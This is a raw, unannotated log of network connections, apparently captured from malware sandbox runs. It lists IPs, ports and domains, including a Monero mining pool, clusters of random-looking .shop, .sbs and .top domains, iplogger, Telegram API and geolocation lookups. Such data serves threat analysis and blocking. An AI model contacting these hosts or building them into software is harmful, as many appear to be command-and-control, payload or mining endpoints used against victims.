IR 2.176.72.136:40500 udp
US 192.210.150.26:8787 tcp
UZ 84.54.71.94:40500 udp
US 192.210.150.26:8787 tcp
UZ 93.188.86.253:40500 tcp
US 192.210.150.26:8787 tcp
EG 45.241.38.203:40500 udp
US 192.210.150.26:8787 tcp
IR 2.177.40.206:40500 udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 123.ywxww.net udp
IR 5.232.126.125:40500 udp
CN 60.191.208.187:820 123.ywxww.net tcp
US 192.210.150.26:8787 tcp
US 192.210.150.26:8787 tcp
KZ 2.133.70.66:40500 udp
US 192.210.150.26:8787 tcp
MX 189.167.22.36:40500 udp
US 192.210.150.26:8787 tcp
UZ 92.38.19.10:40500 tcp
MX 189.135.23.235:40500 udp
US 192.210.150.26:8787 tcp
N/A 172.16.16.140:40500 udp
US 192.210.150.26:8787 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
GB 20.26.156.215:443 github.com tcp
BG 195.230.23.72:80 tcp
US 20.83.148.22:8080 20.83.148.22 tcp
US 192.210.150.26:8787 tcp
GH 196.175.1.52:40500 udp
DE 94.156.177.33:80 94.156.177.33 tcp
DE 172.105.66.118:80 172.105.66.118 tcp
NL 185.180.196.46:80 185.180.196.46 tcp
US 192.210.150.26:8787 tcp
NL 89.110.69.103:80 tcp
US 192.210.150.26:8787 tcp
NL 89.110.69.103:80 tcp
RU 188.124.116.191:40500 udp
US 192.210.150.26:8787 tcp
US 192.210.150.26:8787 tcp
IR 151.233.61.190:40500 tcp
RU 94.51.68.160:40500 udp
US 192.210.150.26:8787 tcp
UZ 83.222.7.85:40500 udp
US 192.210.150.26:8787 tcp
RU 176.113.115.33:80 176.113.115.33 tcp
IR 89.43.216.137:40500 udp
RU 176.113.115.163:80 176.113.115.163 tcp
US 192.210.150.26:8787 tcp
US 192.210.150.26:8787 tcp
YE 178.130.118.237:40500 udp
VN 103.173.254.78:80 103.173.254.78 tcp
CN 111.231.145.137:8888 tcp
US 192.210.150.26:8787 tcp
TJ 95.142.87.201:40500 udp
US 192.210.150.26:8787 tcp
SY 77.44.192.46:40500 udp
KG 212.112.107.11:40500 tcp
US 192.210.150.26:8787 tcp
KZ 95.59.33.46:40500 udp
US 192.210.150.26:8787 tcp
BG 195.230.23.72:80 tcp
US 192.210.150.26:8787 tcp
SY 82.100.175.13:40500 udp
US 192.210.150.26:8787 tcp
RU 91.122.218.118:40500 udp
US 192.210.150.26:8787 tcp
BR 147.45.116.5:80 147.45.116.5 tcp
US 8.8.8.8:53 google.com udp
IR 185.123.69.190:40500 udp
FR 216.58.214.174:443 google.com tcp
US 8.8.8.8:53 www.google.com udp
US 192.210.150.26:8787 tcp
FR 172.217.20.164:443 www.google.com tcp
HK 134.122.129.18:80 134.122.129.18 tcp
US 8.8.8.8:53 twizt.net udp
RU 185.215.113.66:80 twizt.net tcp
US 192.210.150.26:8787 tcp
SY 77.44.162.69:40500 udp
IR 5.232.120.72:40500 tcp
US 8.8.8.8:53 deauduafzgezzfgm.top udp
RU 185.215.113.66:80 deauduafzgezzfgm.top tcp
US 192.210.150.26:8787 tcp
RU 31.41.244.12:80 31.41.244.12 tcp
KZ 92.47.230.214:40500 udp
US 8.8.8.8:53 aeufoeahfouefhg.top udp
RU 185.215.113.66:80 aeufoeahfouefhg.top tcp
RU 194.87.248.37:1912 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.21:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 16.15.176.226:443 bbuseruploads.s3.amazonaws.com tcp
IR 2.176.112.82:40500 udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 192.210.150.26:8787 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
KZ 2.134.250.184:40500 udp
RU 194.87.248.37:1912 tcp
US 192.210.150.26:8787 tcp
US 192.210.150.26:8787 tcp
AO 102.130.192.212:40500 udp
RU 194.87.248.37:1912 tcp
US 192.210.150.26:8787 tcp
UZ 93.188.86.208:40500 udp
TR 163.5.242.208:80 163.5.242.208 tcp
IR 2.176.112.82:40500 tcp
US 192.210.150.26:8787 tcp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 worddosofrm.shop udp
UZ 86.62.3.67:40500 udp
US 8.8.8.8:53 mutterissuen.shop udp
US 8.8.8.8:53 standartedby.shop udp
US 8.8.8.8:53 nightybinybz.shop udp
RU 194.87.248.37:1912 tcp
US 8.8.8.8:53 conceszustyb.shop udp
US 8.8.8.8:53 bakedstusteeb.shop udp
US 8.8.8.8:53 respectabosiz.shop udp
US 8.8.8.8:53 moutheventushz.shop udp
US 8.8.8.8:53 steamcommunity.com udp
FR 23.217.238.254:443 steamcommunity.com tcp
EG 102.189.164.188:40500 udp
US 192.210.150.26:8787 tcp
RU 194.87.248.37:1912 tcp
US 96.248.52.125:8031 tcp
US 192.210.150.26:8787 tcp
US 185.208.159.121:80 185.208.159.121 tcp
US 185.208.159.121:80 185.208.159.121 tcp
US 8.8.8.8:53 down.mvip8.ru udp
US 172.67.130.102:80 down.mvip8.ru tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 win-network-checker.cc udp
UZ 93.188.86.253:40500 udp
NL 85.31.47.154:80 win-network-checker.cc tcp
RU 185.215.113.36:80 185.215.113.36 tcp
RU 194.87.248.37:1912 tcp
TR 163.5.242.208:80 163.5.242.208 tcp
TR 163.5.242.208:80 163.5.242.208 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 cxlugg.sbs udp
FR 23.217.238.254:443 steamcommunity.com tcp
US 8.8.8.8:53 peerhost59mj7i6macla65r.com udp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
FI 37.27.43.98:443 37.27.43.98 tcp
RU 185.215.113.67:27667 tcp
RU 185.215.113.26:80 tcp
KZ 95.59.165.102:40500 udp
FI 95.216.107.53:12311 tcp
FI 37.27.43.98:443 37.27.43.98 tcp
US 192.210.150.26:8787 tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
FI 37.27.43.98:443 37.27.43.98 tcp
US 8.8.8.8:53 downsexv.com udp
US 172.67.189.30:80 downsexv.com tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
FI 37.27.43.98:443 37.27.43.98 tcp
KR 152.67.212.187:443 152.67.212.187 tcp
US 8.8.8.8:53 pb.agnt.ru udp
RU 45.90.34.133:443 pb.agnt.ru tcp
NL 94.154.172.218:443 peerhost59mj7i6macla65r.com tcp
FI 37.27.43.98:443 37.27.43.98 tcp
FI 37.27.43.98:443 37.27.43.98 tcp
US 8.8.8.8:53 fnback9636.site udp
IR 151.247.143.25:40500 tcp
RU 194.87.248.37:1912 tcp
FI 37.27.43.98:443 37.27.43.98 tcp
US 8.8.8.8:53 up.maolaoban.top udp
FI 37.27.43.98:443 37.27.43.98 tcp
FI 95.216.107.53:12311 tcp
AO 102.219.187.80:40500 udp
US 192.210.150.26:8787 tcp
KR 152.67.212.187:443 152.67.212.187 tcp
DE 185.232.59.135:80 up.maolaoban.top tcp
US 8.8.8.8:53 lol.7hacks.click udp
US 198.54.115.219:443 lol.7hacks.click tcp
US 8.8.8.8:53 c1.5yyz.com udp
CN 123.184.58.35:80 c1.5yyz.com tcp
US 8.8.8.8:53 HITROL-60505.portmap.host udp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
US 8.8.8.8:53 fnback9636.site udp
US 192.210.150.26:8787 tcp
FI 95.216.107.53:12311 tcp
RU 194.186.84.81:40500 udp
PL 185.16.38.41:2034 tcp
RU 194.87.248.37:1912 tcp
AT 77.73.131.68:6969 tcp
US 192.210.150.26:8787 tcp
FI 95.216.107.53:12311 tcp
US 96.248.52.125:8031 tcp
RU 31.23.95.118:40500 udp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
PL 185.16.38.41:2024 tcp
US 8.8.8.8:53 fnback9636.site udp
US 192.210.150.26:8787 tcp
AT 77.73.131.68:6969 tcp
FI 95.216.107.53:12311 tcp
RU 194.87.248.37:1912 tcp
IR 85.185.237.83:40500 udp
RU 185.215.113.26:80 tcp
US 8.8.8.8:53 twizthash.net udp
RU 185.215.113.66:80 twizthash.net tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 home.sevkk17pn.top udp
US 8.8.8.8:53 c2.5yyz.com udp
RU 185.215.113.67:27667 tcp
US 8.8.8.8:53 fnback9636.site udp
AT 77.73.131.68:6969 tcp
CN 113.65.5.223:8283 c2.5yyz.com tcp
BG 195.230.23.72:80 tcp
FI 95.216.107.53:12311 tcp
CN 183.57.21.131:8095 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
KZ 178.91.130.114:40500 udp
US 192.210.150.26:8787 tcp
RU 194.87.248.37:1912 tcp
FI 95.216.107.53:12311 tcp
US 192.210.150.26:8787 tcp
IR 2.176.119.113:40500 tcp
AT 77.73.131.68:6969 tcp
FI 95.216.107.53:12311 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fnback9636.site udp
AO 129.122.232.67:40500 udp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 apps.game.qq.com udp
HK 43.129.139.164:80 apps.game.qq.com tcp
AT 77.73.131.68:6969 tcp
CN 123.184.58.35:80 c1.5yyz.com tcp
KZ 2.132.15.134:40500 udp
US 96.248.52.125:8031 tcp
US 192.210.150.26:8787 tcp
RU 194.87.248.37:1912 tcp
FI 95.216.107.53:12311 tcp
SY 77.44.131.125:40500 udp
US 8.8.8.8:53 rddissisifigifidi.net udp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
US 192.210.150.26:8787 tcp
RU 185.215.113.67:27667 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
FI 95.216.107.53:12311 tcp
AT 77.73.131.68:6969 tcp
US 192.210.150.26:8787 tcp
RU 194.87.248.37:1912 tcp
SY 178.253.102.214:40500 udp
US 8.8.8.8:53 fnback9636.site udp
AT 77.73.131.68:6969 tcp
FI 95.216.107.53:12311 tcp
CN 113.65.5.223:8283 c2.5yyz.com tcp
US 8.8.8.8:53 amenstilo.website udp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
UZ 90.156.166.108:40500 udp
EG 197.121.126.87:40500 tcp
AT 77.73.131.68:6969 tcp
RU 194.87.248.37:1912 tcp
IR 91.185.130.166:40500 udp
US 192.210.150.26:8787 tcp
N/A 127.0.0.1:51160 tcp
AT 77.73.131.68:6969 tcp
US 8.8.8.8:53 UmLcmUHSTT.UmLcmUHSTT udp
KR 152.67.212.187:443 152.67.212.187 tcp
US 8.8.8.8:53 amenstilo.website udp
MX 189.167.57.71:40500 udp
US 96.248.52.125:8031 tcp
DE 94.156.177.33:80 94.156.177.33 tcp
US 192.210.150.26:8787 tcp
RU 185.215.113.67:27667 tcp
UZ 185.203.237.215:40500 udp
FI 95.216.107.53:12311 tcp
US 8.8.8.8:53 amenstilo.website udp
RU 194.87.248.37:1912 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
US 8.8.8.8:53 fnback9636.site udp
BG 195.230.23.72:80 tcp
NL 89.110.69.103:80 tcp
FI 95.216.107.53:12311 tcp
IR 93.118.99.152:40500 udp
AT 77.73.131.68:6969 tcp
IR 2.187.42.28:40500 udp
US 8.8.8.8:53 amenstilo.website udp
RU 194.87.248.37:1912 tcp
NL 89.110.69.103:80 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
UZ 90.156.160.6:40500 tcp
KZ 31.169.15.229:40500 udp
FI 95.216.107.53:12311 tcp
US 192.210.150.26:8787 tcp
AT 77.73.131.68:6969 tcp
US 8.8.8.8:53 amenstilo.website udp
IR 2.189.31.47:40500 udp
FI 95.216.107.53:12311 tcp
FR 141.94.96.71:3333 pool.supportxmr.com tcp
US 96.248.52.125:8031 tcp
RU 185.215.113.67:27667 tcp
KZ 31.171.185.170:40500 udp
US 8.8.8.8:53 amenstilo.website udp
US 8.8.8.8:53 fender-shop.online udp
NL 5.181.202.246:443 fender-shop.online tcp
RU 194.87.248.37:1912 tcp
IR 46.248.37.226:40500 udp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
MX 189.150.7.25:40500 udp
US 8.8.8.8:53 amenstilo.website udp
FI 95.216.107.53:12311 tcp
US 192.210.150.26:8787 tcp
KZ 95.59.171.222:40500 tcp
AT 77.73.131.68:6969 tcp
IR 212.120.203.199:40500 udp
RU 194.87.248.37:1912 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fnback9636.site udp
US 8.8.8.8:53 amenstilo.website udp
IR 2.177.150.123:40500 udp
RU 185.215.113.67:27667 tcp
KR 152.67.212.187:443 152.67.212.187 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
FI 95.216.107.53:12311 tcp
US 96.248.52.125:8031 tcp
IR 2.187.40.5:40500 udp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 amenstilo.website udp
AT 77.73.131.68:6969 tcp
RU 194.87.248.37:1912 tcp
KZ 178.90.200.255:40500 tcp
US 198.163.193.223:40500 udp
US 192.210.150.26:8787 tcp
AT 77.73.131.68:6969 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
US 8.8.8.8:53 amenstilo.website udp
AT 77.73.131.68:6969 tcp
UZ 90.156.161.82:40500 udp
AT 77.73.131.68:6969 tcp
RU 194.87.248.37:1912 tcp
RU 185.215.113.67:27667 tcp
FI 95.216.107.53:12311 tcp
UZ 90.156.163.33:40500 udp
FI 95.216.107.53:12311 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
US 96.248.52.125:8031 tcp
UZ 146.120.17.117:40500 udp
US 192.210.150.26:8787 tcp
RU 194.87.248.37:1912 tcp
FI 95.216.107.53:12311 tcp
US 192.210.150.26:8787 tcp
IR 212.120.203.199:40500 tcp
AT 77.73.131.68:6969 tcp
FI 95.216.107.53:12311 tcp
US 192.210.150.26:8787 tcp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
AT 77.73.131.68:6969 tcp
IR 2.185.39.132:40500 udp
RU 185.215.113.16:80 185.215.113.16 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
AT 77.73.131.68:6969 tcp
RU 194.87.248.37:1912 tcp
FI 95.216.107.53:12311 tcp
NL 5.181.202.246:443 fender-shop.online tcp
US 192.210.150.26:8787 tcp
KZ 95.58.74.111:40500 udp
AT 77.73.131.68:6969 tcp
FI 95.216.107.53:12311 tcp
RU 185.215.113.67:27667 tcp
US 192.210.150.26:8787 tcp
AT 77.73.131.68:6969 tcp
EG 45.242.17.111:40500 udp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
RU 194.87.248.37:1912 tcp
US 192.210.150.26:8787 tcp
AT 77.73.131.68:6969 tcp
FI 95.216.107.53:12311 tcp
US 8.8.8.8:53 fnback9636.site udp
US 8.8.8.8:53 tvexv20vt.top udp
BG 195.230.23.72:80 tcp
UZ 89.236.217.71:40500 udp
US 96.248.52.125:8031 tcp
US 192.210.150.26:8787 tcp
US 185.208.159.121:80 185.208.159.121 tcp
FI 95.216.107.53:12311 tcp
AT 77.73.131.68:6969 tcp
US 185.208.159.121:80 185.208.159.121 tcp
RU 185.215.113.209:80 185.215.113.209 tcp
RU 194.87.248.37:1912 tcp
NL 45.66.231.214:9932 tcp
US 8.8.8.8:53 bitkiselurunsiparis.com udp
TR 94.73.144.130:443 bitkiselurunsiparis.com tcp
RU 178.206.158.183:40500 udp
US 192.210.150.26:8787 tcp
AT 77.73.131.68:6969 tcp
US 8.8.8.8:53 tvexv20vt.top udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
FI 95.216.107.53:12311 tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
IR 5.219.134.102:40500 tcp
US 192.210.150.26:8787 tcp
IR 5.239.147.239:40500 udp
US 8.8.8.8:53 tvexv20vt.top udp
CN 183.57.21.131:8095 tcp
FI 95.216.107.53:12311 tcp
US 8.8.8.8:53 liveos.zapto.org udp
NL 194.26.192.138:2404 liveos.zapto.org tcp
RU 194.87.248.37:1912 tcp
US 192.210.150.26:8787 tcp
KR 152.67.212.187:443 152.67.212.187 tcp
YE 134.35.158.149:40500 udp
AT 77.73.131.68:6969 tcp
RU 185.215.113.67:27667 tcp
FI 95.216.107.53:12311 tcp
N/A 127.0.0.1:51989 tcp
N/A 127.0.0.1:52000 tcp
N/A 127.0.0.1:52009 tcp
N/A 127.0.0.1:52011 tcp
US 8.8.8.8:53 tvexv20vt.top udp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
US 192.210.150.26:8787 tcp
AT 77.73.131.68:6969 tcp
RU 194.87.248.37:1912 tcp
UZ 90.156.162.48:40500 udp
FI 95.216.107.53:12311 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 tvexv20vt.top udp
AT 77.73.131.68:6969 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
IR 5.234.140.118:40500 udp
FI 95.216.107.53:12311 tcp
AT 77.73.131.68:6969 tcp
US 192.210.150.26:8787 tcp
US 96.248.52.125:8031 tcp
RU 194.87.248.37:1912 tcp
AT 77.73.131.68:6969 tcp
US 8.8.8.8:53 tvexv20vt.top udp
US 192.210.150.26:8787 tcp
FI 95.216.107.53:12311 tcp
EG 45.242.104.231:40500 udp
NL 45.66.231.214:9932 tcp
AT 77.73.131.68:6969 tcp
CN 123.60.37.61:9999 tcp
IR 94.183.35.46:40500 tcp
US 192.210.150.26:8787 tcp
NL 194.26.192.138:2404 liveos.zapto.org tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
AT 77.73.131.68:6969 tcp
FI 95.216.107.53:12311 tcp
RU 194.87.248.37:1912 tcp
US 8.8.8.8:53 tvexv20vt.top udp
UZ 213.206.44.35:40500 udp
AT 77.73.131.68:6969 tcp
US 192.210.150.26:8787 tcp
RU 185.215.113.67:27667 tcp
FI 95.216.107.53:12311 tcp
IR 5.239.109.92:40500 udp
AT 77.73.131.68:6969 tcp
US 8.8.8.8:53 fieldtrollyeowskwe.shop udp
US 8.8.8.8:53 technologyenterdo.shop udp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 8.8.8.8:53 detectordiscusser.shop udp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
US 8.8.8.8:53 associationokeo.shop udp
US 8.8.8.8:53 tvexv20vt.top udp
US 192.210.150.26:8787 tcp
NL 5.181.202.246:443 fender-shop.online tcp
RU 194.87.248.37:1912 tcp
FI 95.216.107.53:12311 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
AO 154.71.253.54:40500 udp
US 8.8.8.8:53 tvexv20vt.top udp
US 192.210.150.26:8787 tcp
FI 95.216.107.53:12311 tcp
BG 195.230.23.72:80 tcp
US 192.210.150.26:8787 tcp
RU 194.87.248.37:1912 tcp
RU 185.215.113.26:80 tcp
US 8.8.8.8:53 tvexv20vt.top udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
FI 95.216.107.53:12311 tcp
US 192.210.150.26:8787 tcp
US 96.248.52.125:8031 tcp
KZ 92.47.52.79:40500 udp
NL 194.26.192.138:2404 liveos.zapto.org tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
NL 45.66.231.214:9932 tcp
US 8.8.8.8:53 tvexv20vt.top udp
RU 194.87.248.37:1912 tcp
RU 31.8.228.20:40500 tcp
UZ 90.156.160.86:40500 udp
FI 95.216.107.53:12311 tcp
RU 185.215.113.67:27667 tcp
US 8.8.8.8:53 tvexv20vt.top udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 jtpdev.co.uk udp
GB 91.238.160.241:443 jtpdev.co.uk tcp
AT 77.73.131.68:6969 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
UZ 89.236.216.14:40500 udp
US 8.8.8.8:53 www.clubedasluluzinhasro.com.br udp
US 67.23.238.117:443 www.clubedasluluzinhasro.com.br tcp
RU 194.87.248.37:1912 tcp
US 8.8.8.8:53 fnback9636.site udp
AT 77.73.131.68:6969 tcp
US 8.8.8.8:53 tvexv20vt.top udp
UZ 90.156.166.42:40500 udp
US 192.210.150.26:8787 tcp
RU 185.215.113.26:80 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
FI 95.216.107.53:12311 tcp
RU 194.87.248.37:1912 tcp
RU 95.29.145.167:40500 udp
US 8.8.8.8:53 tvexv20vt.top udp
CN 60.191.208.187:820 123.ywxww.net tcp
RU 185.215.113.67:15206 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
AT 77.73.131.68:6969 tcp
US 8.8.8.8:53 liveos.zapto.org udp
NL 194.26.192.138:2404 liveos.zapto.org tcp
US 172.67.169.89:443 yip.su tcp
US 172.67.19.24:443 pastebin.com tcp
US 96.248.52.125:8031 tcp
KR 152.67.212.187:443 152.67.212.187 tcp
FI 95.216.107.53:12311 tcp
DE 94.156.177.33:80 94.156.177.33 tcp
US 192.210.150.26:8787 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
NL 45.66.231.214:9932 tcp
RU 194.87.248.37:1912 tcp
US 8.8.8.8:53 tvexv20vt.top udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
FI 95.216.107.53:12311 tcp
RU 82.147.85.194:80 tcp
UZ 89.236.218.158:40500 tcp
RU 185.215.113.67:27667 tcp
KZ 88.204.241.182:40500 udp
AT 77.73.131.68:6969 tcp
US 8.8.8.8:53 tvexv20vt.top udp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com tcp
FI 95.216.107.53:12311 tcp
N/A 127.0.0.1:9222 tcp
RU 194.87.248.37:1912 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 tvexv20vt.top udp
NL 5.181.202.246:443 fender-shop.online tcp
US 8.8.8.8:53 selltix.org udp
BG 195.230.23.72:80 tcp
US 8.8.8.8:53 otyt.ru udp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
US 8.8.8.8:53 nudump.com udp
US 8.8.8.8:53 tianyinsoft.top udp
CN 139.9.248.128:80 tianyinsoft.top tcp
NL 89.110.69.103:80 tcp
US 8.8.8.8:53 tvexv20vt.top udp
US 8.8.8.8:53 otyt.ru udp
NL 194.26.192.138:2404 liveos.zapto.org tcp
N/A 127.0.0.1:9222 tcp
N/A 127.0.0.1:9222 tcp
US 8.8.8.8:53 nudump.com udp
AT 77.73.131.68:6969 tcp
RU 78.81.147.173:40500 udp
RU 194.87.248.37:1912 tcp
RU 185.215.113.67:15206 tcp
FI 95.216.107.53:12311 tcp
US 96.248.52.125:8031 tcp
TJ 91.218.161.58:40500 udp
US 8.8.8.8:53 tvexv20vt.top udp
US 8.8.8.8:53 selltix.org udp
US 8.8.8.8:53 property-imper.sbs udp
US 8.8.8.8:53 frogs-severz.sbs udp
GB 38.180.203.11:1010 tcp
RU 185.215.113.67:27667 tcp
NL 45.66.231.214:9932 tcp
US 8.8.8.8:53 tvexv20vt.top udp
US 192.210.150.26:8787 tcp
IR 5.202.242.190:40500 udp
RU 194.87.248.37:1912 tcp
MX 187.194.22.140:40500 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
AT 77.73.131.68:6969 tcp
US 8.8.8.8:53 tvexv20vt.top udp
NL 89.110.69.103:80 tcp
US 8.8.8.8:53 selltix.org udp
CN 183.57.21.131:8095 tcp
US 8.8.8.8:53 occupy-blushi.sbs udp
RU 5.139.95.144:40500 udp
FI 95.216.107.53:12311 tcp
US 8.8.8.8:53 blade-govern.sbs udp
NL 194.26.192.138:2404 liveos.zapto.org tcp
US 8.8.8.8:53 story-tense-faz.sbs udp
US 8.8.8.8:53 leg-sate-boat.sbs udp
US 8.8.8.8:53 disobey-curly.sbs udp
US 8.8.8.8:53 motion-treesz.sbs udp
US 8.8.8.8:53 powerful-avoids.sbs udp
US 8.8.8.8:53 steamcommunity.com udp
NL 92.122.63.136:443 steamcommunity.com tcp
US 8.8.8.8:53 tvexv20vt.top udp
AT 77.73.131.68:6969 tcp
KR 152.67.212.187:443 152.67.212.187 tcp
RU 194.87.248.37:1912 tcp
IR 151.242.48.19:40500 udp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
RU 185.215.113.67:15206 tcp
US 8.8.8.8:53 tvexv20vt.top udp
US 96.248.52.125:8031 tcp
RU 185.215.113.67:27667 tcp
YE 46.35.80.190:40500 udp
US 192.210.150.26:8787 tcp
NL 45.66.231.214:9932 tcp
AT 77.73.131.68:6969 tcp
US 8.8.8.8:53 tvexv20vt.top udp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 otyt.ru udp
BG 146.70.53.161:40500 tcp
GB 38.180.203.11:1010 tcp
FI 95.216.107.53:12311 tcp
US 8.8.8.8:53 sirault.be udp
BG 195.230.23.72:80 tcp
FR 185.98.131.200:443 sirault.be tcp
RU 194.87.248.37:1912 tcp
US 8.8.8.8:53 tvexv20vt.top udp
US 8.8.8.8:53 otyt.ru udp
NL 194.26.192.138:2404 liveos.zapto.org tcp
UZ 90.156.162.5:40500 udp
AT 77.73.131.68:6969 tcp
US 8.8.8.8:53 otyt.ru udp
US 8.8.8.8:53 HITROL-60505.portmap.host udp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
FI 95.216.107.53:12311 tcp
US 8.8.8.8:53 tvexv20vt.top udp
AT 77.73.131.68:6969 tcp
US 192.210.150.26:8787 tcp
UZ 93.188.80.134:40500 udp
FI 95.216.107.53:12311 tcp
RU 194.87.248.37:1912 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 tvexv20vt.top udp
RU 188.124.116.191:40500 tcp
RU 185.215.113.67:27667 tcp
RU 185.215.113.67:15206 tcp
IR 5.53.53.141:40500 udp
FI 95.216.107.53:12311 tcp
US 96.248.52.125:8031 tcp
US 192.210.150.26:8787 tcp
NL 5.181.202.246:443 fender-shop.online tcp
AT 77.73.131.68:6969 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
US 8.8.8.8:53 tvexv20vt.top udp
NL 45.66.231.214:9932 tcp
US 192.210.150.26:8787 tcp
RU 194.87.248.37:1912 tcp
FI 95.216.107.53:12311 tcp
TM 91.202.233.141:80 91.202.233.141 tcp
AT 77.73.131.68:6969 tcp
US 8.8.8.8:53 nudump.com udp
US 192.210.150.26:8787 tcp
AT 77.73.131.68:6969 tcp
FI 95.216.107.53:12311 tcp
US 8.8.8.8:53 tvexv20vt.top udp
NL 194.26.192.138:2404 liveos.zapto.org tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
AT 77.73.131.68:6969 tcp
US 8.8.8.8:53 nudump.com udp
US 192.210.150.26:8787 tcp
RU 194.87.248.37:1912 tcp
GB 38.180.203.11:1010 tcp
FI 95.216.107.53:12311 tcp
US 8.8.8.8:53 tvexv20vt.top udp
AT 77.73.131.68:6969 tcp
US 192.210.150.26:8787 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
US 8.8.8.8:53 nudump.com udp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
FI 95.216.107.53:12311 tcp
US 192.210.150.26:8787 tcp
RU 194.87.248.37:1912 tcp
RU 185.215.113.67:27667 tcp
US 192.210.150.26:8787 tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
FI 95.216.107.53:12311 tcp
US 8.8.8.8:53 tvexv20vt.top udp
RU 185.215.113.67:15206 tcp
AT 77.73.131.68:6969 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 fnback9636.site udp
US 96.248.52.125:8031 tcp
US 185.208.159.121:80 185.208.159.121 tcp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
RU 194.87.248.37:1912 tcp
US 185.208.159.121:80 185.208.159.121 tcp
FI 95.216.107.53:12311 tcp
US 8.8.8.8:53 tvexv20vt.top udp
NL 45.66.231.214:9932 tcp
BG 195.230.23.72:80 tcp
US 192.210.150.26:8787 tcp
AT 77.73.131.68:6969 tcp
NL 194.26.192.138:2404 liveos.zapto.org tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
US 8.8.8.8:53 selltix.org udp
FI 95.216.107.53:12311 tcp
US 8.8.8.8:53 tvexv20vt.top udp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
RU 194.87.248.37:1912 tcp
AT 77.73.131.68:6969 tcp
US 8.8.8.8:53 claywyaeropumps.com udp
US 192.210.150.26:8787 tcp
FI 95.216.107.53:12311 tcp
AT 77.73.131.68:6969 tcp
US 192.210.150.26:8787 tcp
US 8.8.8.8:53 tvexv20vt.top udp
GB 38.180.203.11:1010 tcp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
DE 193.161.193.99:60505 HITROL-60505.portmap.host tcp
KR 152.67.212.187:443 152.67.212.187 tcp
FI 95.216.107.53:12311 tcp
